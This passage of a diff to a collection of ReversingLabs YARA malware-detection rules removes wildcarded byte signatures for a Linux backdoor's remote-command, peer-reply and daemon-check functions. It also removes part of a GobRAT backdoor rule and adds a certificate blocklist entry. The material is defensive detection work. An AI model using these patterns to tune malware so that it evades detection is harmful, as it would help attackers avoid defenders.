-            ?? ?? ?? 8B 45 ?? 0F B7 40 ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 83
-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 85
-            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F
-            5D C3
-        }
-		$execute_remote_command_v1 = {
-            55 89 E5 57 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
-            B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 03 45
-            ?? 66 C7 00 ?? ?? C6 40 ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B
-            7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 66 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 0F B7 45 ?? 89 C2 03 55 ?? 8B 45 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ??
-            B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 0F B7 C0 89 45 ?? EB ?? 8B 45
-            ?? 89 04 24 E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 89 C2 03 55 ?? 0F
-            B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
-        }
-		$send_reply_v1_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89
-            45 ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            14 24 E8 ?? ?? ?? ?? 8B 55 ?? 0F B6 02 83 E0 ?? 83 C8 ?? 88 02 8B 55 ?? 0F B6 02 83
-            E0 ?? 83 C8 ?? 88 02 8B 45 ?? C6 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2
-            8B 45 ?? 66 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E0 ?? 8B 55 ?? 89 C1 83 E1 ?? 0F B6 42 ?? 83
-            E0 ?? 09 C8 88 42 ?? 8B 45 ?? 0F B6 50 ?? 8B 45 ?? 88 50 ?? 8B 45 ?? C6 40 ?? ?? 8B
-            45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45
-            ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ??
-            ?? 89 45 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 66 89 10 8B 45 ?? 0F B7 10 8B 45 ?? 66 89
-            50 ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ??
-            ?? ?? ?? 66 89 45 ?? 0F B7 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 89 C2 8B 45 ?? 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66
-            89 50 ?? EB ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89
-        }
-		$send_reply_v1_p2 = {
-            50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6
-            42 ?? 83 E0 ?? 88 42 ?? 8B 55 ?? 0F B6 42 ?? 83 E0 ?? 83 C8 ?? 88 42 ?? 8B 45 ?? C6
-            40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B
-            40 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
-            8D 85 ?? ?? ?? ?? 8D 48 ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
-            8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44
-            24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
-            89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8B
-            45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89
-        }
-		$send_reply_v1_p3 = {
-            41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8D 85 ?? ?? ?? ?? 8D 48
-            ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42
-            ?? 89 41 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 95
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 39 C2 0F 85 ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 74 ??
-            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 85 C0 75
-            ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 14 C5 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 29 D0 89 C1 B8 ?? ?? ?? ?? D3 E0 89 45 ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 23
-            45 ?? 89 45 ?? 8B 45 ?? 23 45 ?? 89 45 ?? 8B 45 ?? 3B 45 ?? 75 ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 83 45 ?? ?? 83 7D ?? ?? 7E ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-        }
-		$daemon_already_running_check_v1 = {
-            55 89 E5 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 74 ?? E8
-            ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE
-            89 C8 F7 D0 83 E8 ?? 83 C0 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
-        }
-		$send_result_to_peer_v2_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 44 89 C0 66 89 95 ?? ?? FF FF 66 89 85 ?? ?? FF FF 48 8D BD ?? ?? ?? ?? BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? FF FF
-            ?? ?? 77 ?? 0F B7 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7
-            48 89 D6 FC F3 A4 EB ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 48 89 D6
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ??
-            89 45 ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 89 50 ?? 48 8B 55 ?? 8B 45 ?? 89 42 ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
-            45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 48 8B 45 ?? 0F
-            B7 10 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 48 98 48 89
-            C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0
-            ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B
-            45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? FF FF ?? ?? 76 ?? 48 8B 45 ?? 48 83 C0 ?? BF
-            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 49 89 C0 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40
-            ?? ?? ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 0F B7 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8B 95
-            ?? ?? ?? ?? 49 89 C0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 C0 ?? 0F
-        }
-		$send_result_to_peer_v2_p2 = {
-            B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 85 ?? ?? ?? ??
-            66 89 42 ?? 48 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
-            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 50 ?? 48 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D 50 ?? 48
-            8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
-            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45
-            ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 48 8B 7D ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 8B 70
-            ?? 41 89 C8 48 89 F9 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48
-            8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ??
-            89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 89
-            C6 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 8B
-            40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 85
-            ?? ?? FF FF 48 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 48 83 C0 ?? 48 8D B5 ?? ?? ?? ?? 8B BD
-            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? C9 C3
-        }
-		$execute_remote_command_v2 = {
-            55 48 89 E5 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 8B 75 ?? 48 8B 7D ?? E8 ?? ?? ??
-            ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE
-            48 89 C8 48 F7 D0 48 83 E8 ?? 48 03 45 ?? 66 C7 00 ?? ?? C6 40 ?? ?? 48 8B 45 ?? 48
-            C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0
-            48 83 E8 ?? 66 89 45 ?? 48 8B 7D ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            98 48 89 45 ?? 48 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 8B 7D
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 48 89 C7 48 03 7D ?? 48 8B 55 ?? BE ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ??
-            B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C0 89 45 ??
-            EB ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 48 89 C2 48
-            03 55 ?? 0F B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 48 8B 7D ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? C9 C3
-        }
-		$main_routine_v2_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 48 8D BD ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48
-            8B BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 48 83 F8 ?? 76 ?? 48 8B 85 ??
-            ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B
-            BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 00 48
-            89 C7 FC 48 89 D1 B8 ?? ?? ?? ?? F3 AA 48 8B 85 ?? ?? ?? ?? 48 8B 00 C7 00 ?? ?? ??
-            ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
-            75 ?? E8 ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? 8B 7D ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 79 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 BA ?? ??
-            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 8B 7D ?? B9 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E ?? 48 8D 85 ?? ?? ?? ?? 48 89 45
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
-        }
-		$main_routine_v2_p2 = {
-            45 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 8B 45 ?? 83
-            C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48
-            98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8B 45 ?? 48 83 C0 ?? 48 8D 95 ?? ?? ?? ?? 8B 00 89 02 8B 95 ?? ?? ?? ?? 8B 05 ??
-            ?? ?? ?? 39 C2 74 ?? 8B 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 45 ?? 0F B6
-            40 ?? 0F B6 D0 8B 75 ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 48
-            83 C6 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 55 ?? 48 83 C2 ?? BF ?? ?? ?? ?? 49
-            89 F0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 84 C0 0F 84 ?? ?? ?? ??
-            48 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 48 8B 45 ?? 48 83 C0 ?? 8B 00 89 05 ?? ?? ?? ??
-            48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AA 48 8D 85 ?? ?? ?? ?? 48
-        }
-		$main_routine_v2_p3 = {
-            C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B BD ?? ?? ?? ?? F2 AE
-            48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C8 4C 8D 8D ?? ?? ?? ?? 8B 45 ?? 0F B7 D0 48 8D
-            B5 ?? ?? ?? ?? 8B 7D ?? 41 89 C8 4C 89 C9 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ??
-            0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 75 ?? BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? BA ?? ??
-            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F
-            B7 D0 48 8B 7D ?? 48 83 C7 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ??
-            0F B7 D0 8B 05 ?? ?? ?? ?? 8D 04 02 89 05 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 50 ?? 0F B7
-            05 ?? ?? ?? ?? 66 39 C2 0F 84 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7
-            05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3
-            AA 8B 15 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $send_result_to_peer_v1_p* ) ) and ( $execute_remote_command_v1 ) and ( all of ( $send_reply_v1_p* ) ) and ( $daemon_already_running_check_v1 ) ) or ( ( all of ( $send_result_to_peer_v2_p* ) ) and ( $execute_remote_command_v2 ) and ( all of ( $main_routine_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Gobrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GobRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "390bd83e-ac43-511a-b07b-3dc3d9890353"
-		date = "2025-03-27"
-		modified = "2025-03-27"
+		id = "792111be-7c8a-53f5-9ec3-e1f25f083666"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.GobRAT.yara#L1-L168"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce29568231a4103663f4b478de3210e00e14b14eda7781f05ecf0cf576fc5ad2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10408-L10424"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "GobRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_local_address_p1 = {
-            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 C4 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 83 3D ??
-            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9
-            EB ?? 48 8B 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ??
-            ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 EC ?? C3 48 83
-            C0 ?? 48 89 D1 48 8B 50 ?? 4C 8D 0D ?? ?? ?? ?? 4C 39 08 74 ?? BA ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 74 ?? 31 F6 EB ?? 48 8B 02 48 8B 5A ?? 48 8B
-            4A ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B
-            5C 24 ?? 4C 8D 0D ?? ?? ?? ?? 31 F6 EB ?? 48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B
-            4A ?? E8 ?? ?? ?? ?? 83 F0 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 4C 8D 0D
-            ?? ?? ?? ?? 89 C6 48 8B 44 24 ?? 40 84 F6 74 ?? 4C 8B 12 4C 8B 5A ?? 4C 8B 62 ?? 49
-            83 FB ?? 75 ?? 4C 89 D6 EB ?? 49 83 FB ?? 75 ?? 31 F6 E9 ?? ?? ?? ?? 48 8D 51 ?? 48
-            39 D3 0F 8F ?? ?? ?? ?? 0F 1F 40 ?? E9 ?? ?? ?? ?? 31 F6 48 85 F6 74 ?? 4C 89 D0 4C
-            89 DB 4C 89 E1 E8 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 3D ??
-            ?? ?? ?? 4C 8D 46 ?? 4C 39 C7 73 ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
-            ?? 48 89 D3 48 89 F1 4C 89 C6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48
-        }
-		$get_local_address_p2 = {
-            89 DE 48 8B 44 24 ?? 48 8B 5C 24 ?? 4C 8D 46 ?? 4C 89 05 ?? ?? ?? ?? 48 C1 E6 ?? 48
-            89 5C 32 ?? 48 8D 3C 32 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 04 32 EB ?? E8 ?? ?? ?? ??
-            48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B 4A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
-            35 ?? ?? ?? ?? 48 8D 56 ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 39 D7 73 ??
-            89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 F1 48 89 D6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ??
